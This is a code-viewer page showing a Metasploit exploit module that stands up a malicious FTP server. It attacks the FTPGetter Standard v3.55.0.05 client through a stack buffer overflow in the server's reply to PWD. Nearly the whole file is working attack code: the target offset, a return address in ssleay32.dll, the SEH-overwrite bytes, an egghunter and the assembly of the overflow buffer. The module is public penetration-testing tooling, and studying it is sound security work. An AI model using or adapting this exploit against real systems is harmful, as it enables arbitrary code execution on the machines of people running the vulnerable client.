Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb
19778 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::FtpServer

10
  include Msf::Exploit::Remote::Egghunter

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'FTPGetter Standard v3.55.0.05 Stack Buffer Overflow (PWD)',

17
        'Description' => %q{

18
          This module exploits a buffer overflow in FTPGetter Standard v3.55.0.05 ftp client.

19
          When processing the response on a PWD command, a stack based buffer overflow occurs.

20
          This leads to arbitrary code execution when a structured exception handler gets

21
          overwritten.

22
        },

23
        'Author' => [

24
          'ekse',	# found the bug

25
          'corelanc0d3r <peter.ve[at]corelan.be>',	#  wrote the exploit

26
        ],

27
        'License' => MSF_LICENSE,

28
        'References' => [

29
          [ 'OSVDB', '68638'],

30
          [ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ],

31
        ],

32
        'DefaultOptions' => {

33
          'EXITFUNC' => 'thread',

34
        },

35
        'Payload' => {

36
          'BadChars' => "\x00\xff\x0d\x5c\x2f\x0a",

37
        },

38
        'Platform' => 'win',

39
        'Targets' => [

40
          [ 'XP SP3 Universal', { 'Offset' => 485, 'Ret' => 0x100139E5 } ], # ppr [ssleay32.dll]

41
        ],

42
        'Privileged' => false,

43
        'DisclosureDate' => '2010-10-12',

44
        'DefaultTarget' => 0,

45
        'Notes' => {

46
          'Reliability' => UNKNOWN_RELIABILITY,

47
          'Stability' => UNKNOWN_STABILITY,

48
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

49
        }

50
      )

51
    )

52
  end

53


54
  def setup

55
    super

56
    badchars = ""

57
    eggoptions =

58
      {

59
        :checksum => true,

60
        :eggtag => "W00T"

61
      }

62
    @hunter, @egg = generate_egghunter(payload.encoded, badchars, eggoptions)

63
  end

64


65
  def on_client_unknown_command(c, cmd, arg)

66
    c.put("200 OK\r\n")

67
  end

68


69
  def on_client_command_pass(c, arg)

70
    @state[c][:pass] = arg

71
    c.put("230 OK #{@egg}\r\n")

72
    return

73
  end

74


75
  def on_client_command_pwd(c, arg)

76
    junk1 = "A" * target['Offset']

77
    junk2 = "A" * 9

78
    nseh = "\x74\x06\x41\x41"

79
    jmp = "\x75\x08"

80
    seh = [target.ret].pack('V')

81
    junk3 = "D" * 22000

82
    # dual offset

83
    buffer = junk1 + nseh + seh + junk2 + jmp + nseh + seh + @hunter + junk3

84
    c.put("257 \"/\" #{buffer}\r\n")

85
    print_status("Sent payload, #{buffer.length} bytes")

86
    print_status("Wait for hunter ...")

87
    return

88
  end

89
end

90


91